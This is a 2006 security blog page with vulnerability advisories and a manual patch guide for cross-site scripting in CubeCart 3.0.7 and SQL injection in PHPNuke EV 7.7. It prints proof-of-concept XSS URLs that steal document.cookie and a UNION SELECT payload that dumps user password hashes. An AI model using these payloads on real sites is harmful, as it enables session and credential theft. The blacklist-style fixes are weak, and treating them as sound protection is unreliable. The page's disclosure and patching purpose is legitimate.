MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1

Monday, January 23, 2006
########################################################
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################

1- includes/funcions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################

open includes/functions.inc.php look this code :

arround line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){

$text = preg_replace("/(\)/si", "", "$text");
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}
---------------------------------------------------------

if you have a diferen code like this , replace for this...

#########################################
2- index.php param 'act' and 'searchStr'
#########################################

open index.php at line 90 you have this for 'act' param:

------------------------------
if(isset($_GET['act'])){
switch ($_GET['act']) {

-----------------------------------------

you can change for this:

-------------------------------------------

$_GET['act'] = treatGet($_GET['act']);
if(isset($_GET['act'])){
switch ($_GET['act']) {
---------------------------------------------------

open index.php at line 80 you have this for 'searchStr' param

-----------------------------------------------------

if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
-------------------------------------------------------

you can change for this other:

--------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
--------------------------------------------------

#######################################################
3- fix 'catId' param includes/content/viewCat.inc.php
#######################################################

for fix 'catId' param open includes/content/viewCat.inc.php

found this code at line 50:

--------------------------------------------------
if(isset($_GET['catId'])) {

----------------------------------------

change for this other:
-----------------------------------------

$_GET['catId'] = treatGet($_GET['catId']);
if(isset($_GET['catId'])) {

-----------------------------------------

###################################################
4 fix 'productId' param includes/content/viewProd.inc.php
####################################################

at line 38 you have :

--------------------------------------------------

// query database
$query = "SELECT productId, productCode, quantity, name, description, image,

-----------------------------------------------------------------

you can change forr this other

------------------------------------------------------
// query database
$_GET['productId'] = treatGet($_GET['productId']);
$query = "SELECT productId, productCode, quantity, name, description, image,

---------------------------------------------------------------------

##############################################
5- cart.php fix params 'act' and 'searchStr'
##############################################

open cart.php for fix 'act' param look at line you have this code:

-------------------------------------------
// START MAIN CONTENT
switch ($_GET['act']) {
--------------------------------------------

replace for this other:

---------------------------------------------

// START MAIN CONTENT
$_GET['act'] = treatGet($_GET['act']);
switch ($_GET['act']) {
----------------------------------------------

arround line 69 you have :
--------------------------------
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",$_GET['searchStr']);

------------------------------------------

you can change for:

------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
---------------------------------------------

#######################################################
6- fix param 'docId' includes/content/viewDoc.inc.php
#######################################################

insert this line at line 36:
--------------------------------------
$_GET['docId'] = treatGet($_GET['docId']);
------------------------------------------

#######################################################
7- fix 'act' , 'username' ,'password','remember' and
'redir' params in includes/content/login.inc.php
#######################################################

inser this line at line 35:
---------------------------------------------------------

$_GET['act'] = treatGet($_GET['act']); $_POST['username'] = treatGet($_POST['username']);
$_POST['password'] = treatGet($_POST['password']);
-----------------------------------------------------------

for fix 'redir' param look and insert this line after line 52:

---------------------------------------------
//"login","reg","unsubscribe","forgotPass"
$_GET['redir'] = treatGet($_GET['redir']);
-------------------------------------------------------------

for fix 'remember' param inser this code at line 52:

---------------------------------------------

$_POST['remember'] = treatGet($_POST['remember']);

-------------------------------------------------


######################################
8-fix 'productId' and $_POST
includes/content/tellafriend.inc.php
######################################

open includes/content/tellafriend.inc.php

add this line after line 35 for fix 'productId' param :

------------------------------

// query database
$_GET['productId'] = treatGet($_GET['productId']) ;

-------------------------------------------------------

fix XSS in all boxes wen post,
arround line 58 you have this:

$text = sprintf($lang['front']['tellafriend']['email_body'],$_POST['recipName'],stripslashes($_POST['message']),$GLOBALS['storeURL'],$_GET['productId'],$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);



you can change for this other:
----------------------------------------------------

$text = sprintf($lang['front']['tellafriend']['email_body'],treatGet($_POST['recipName']),stripslashes(treatGet($_POST['message'])),$GLOBALS['storeURL'],treatGet($_GET['productId']),$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);

------------------------------------------------------

##########################
9- THANKS
##########################

I want to thank to all those that belive in my.
To OSVDB (http://www.osvdb.org) by its exelente work.
To All Manglers and Moderators of osvdb they belive in this project and they work for it :)))
To Secunia (http://www.secunia.com) by his verificacion and publication and pursuit of my work ,to Securityfocus (http://www.securityfocus.com)
like a all those that you preocupate of which my work is distributed by different means.
thanks to all those that stays there and all those that no longer stays.
Post by Lostmon in 3:56:00 AM

CubeCart 3.0.7-pl1 index.php multiple variable cross site scripting

Tuesday, January 10, 2006
################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################

I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:

http://www.bindshell.net/papers/xssv.html

CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.

###############
VERSIONS
###############

CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too

#################
Timeline
#################

Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006

###############
Examples:
###############


http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E


http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go

http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>

http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat

http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>

#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>

#############
SOLUTION
#############

no solution was available at this time

currently i found a posible fix :

see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html

or

http://bugs.cubecart.com/?do=details&id=459


##################### €nd ########################

Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Post by Lostmon in 2:06:00 AM
Categories: , ,

PHPNuke EV 7.7 'search' module 'query' variable SQL injection

Monday, January 09, 2006
###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################

PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

PHPNuke EV 7.7 -R1

posible prior versions are afected.

##################
solution:
###################

No solution at this time!!!

A posible fix:

Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------

you can add this other :

------------------------------------

if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit


####################
Timeline
####################

discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006

###################
example:
###################

go to
http://[Victim]/modules.php?name=Search

and write in the search box this proof

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

all users hashes are available to view..

#################### €nd ########################

Thnx to estrella to be my ligth


--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Post by Lostmon in 7:45:00 AM
Subscribe to: Posts (Atom)
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...